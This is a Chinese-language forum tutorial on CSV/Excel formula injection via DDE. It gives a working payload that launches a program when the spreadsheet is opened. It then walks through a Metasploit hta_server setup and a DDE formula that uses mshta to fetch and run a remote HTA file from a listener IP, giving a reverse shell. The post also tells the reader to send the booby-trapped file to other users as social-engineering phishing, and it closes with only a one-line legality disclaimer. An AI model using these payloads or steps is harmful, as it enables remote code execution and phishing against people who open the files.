CSV注入:远程代码执行与社会工程学钓鱼

漏洞介绍: CSV(逗号分隔值)注入是一种危险的攻击方式,可导致严重后果。攻击者利用这种漏洞向Excel文件中注入可执行或读取CSV文件的恶意载荷。当用户打开Excel文件时,文件将从CSV格式转换为原始的Excel格式,其中包括所有Excel提供的动态功能。在此过程中,CSV中的所有Excel公式都将执行,从而可能被滥用以允许执行恶意代码。

漏洞复现:

简易测试: 在Office的”文件->选项->信任中心”中启用”启用动态数据交换服务器启动”功能。

图片[1]-CSV注入:远程代码执行与社会工程学钓鱼-山海云端论坛

构造恶意载荷:

<code>=1+cmd|' /C calc'!A0</code>

这将在Excel中打开计算器。

图片[2]-CSV注入:远程代码执行与社会工程学钓鱼-山海云端论坛

模拟用户打开Excel文件,发现载荷成功执行并打开了计算器。

反弹Shell: 使用Metasploit框架实施攻击,成功上线。

具体步骤如下:

  1. 在Metasploit中使用use exploit/windows/misc/hta_server命令选择合适的模块。
  2. 使用set srvhost 192.168.174.129命令设置监听主机IP。
  3. 使用exploit命令启动监听器。
  4. 在Excel中插入恶意载荷:=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0
  5. 将包含恶意文件的Excel发送给其他用户。
  6. 当用户打开Excel文件时,成功反弹Shell并在Metasploit中成功上线。

文末小结: CSV注入通常出现在数据导出功能中,例如将表格数据导出到Excel。攻击者可以在导出的表格中插入恶意代码,使得用户再次打开Excel时触发恶意载荷执行。此外,CSV注入还可用于社会工程学钓鱼攻击,攻击者可以构造包含恶意代码的Excel文件,诱导受害者打开并执行恶意代码。在使用此漏洞进行攻击时,请务必确保遵守法律法规,仅在合法授权的环境中使用。

© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容